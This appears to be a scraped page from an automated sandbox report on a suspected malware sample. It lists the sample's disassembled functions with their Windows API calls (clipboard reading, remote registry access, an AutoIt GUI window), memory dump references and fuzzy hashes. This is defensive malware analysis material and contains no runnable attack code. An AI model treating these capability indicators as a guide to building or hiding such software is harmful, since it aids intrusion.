                                                                                                                                                                                                                                                            • Opcode ID: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
                                                                                                                                                                                                                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                                                                                                                                            Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cursor$Load
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1675784387-0
                                                                                                                                                                                                                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                                                                                                            Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1582027408-0
                                                                                                                                                                                                                                                            • Opcode ID: 8a29764326f71ace7425698184acd64be4b8c6c6fa5793dcd55699e731a1e8e3
                                                                                                                                                                                                                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a29764326f71ace7425698184acd64be4b8c6c6fa5793dcd55699e731a1e8e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                                                                                                            Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                            • API String ID: 3217815495-966354055
                                                                                                                                                                                                                                                            • Opcode ID: 1613d105b25f0b894bdd56f24aebc34531e7f06dd219b39307bf90ae4898f291
                                                                                                                                                                                                                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1613d105b25f0b894bdd56f24aebc34531e7f06dd219b39307bf90ae4898f291
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                                                                                                            Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                            • API String ID: 225202481-3320066284
                                                                                                                                                                                                                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                                                            Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15083398-0
                                                                                                                                                                                                                                                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                                                                                                            Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                            • String ID: @$AutoIt v3 GUI
                                                                                                                                                                                                                                                            • API String ID: 867697134-3359773793
                                                                                                                                                                                                                                                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                                                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                                                                                                                            Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                                                                                                                            • API String ID: 790654849-32604322
                                                                                                                                                                                                                                                            • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                                                                                                                                                                                                                                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                                                                                                                                            Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
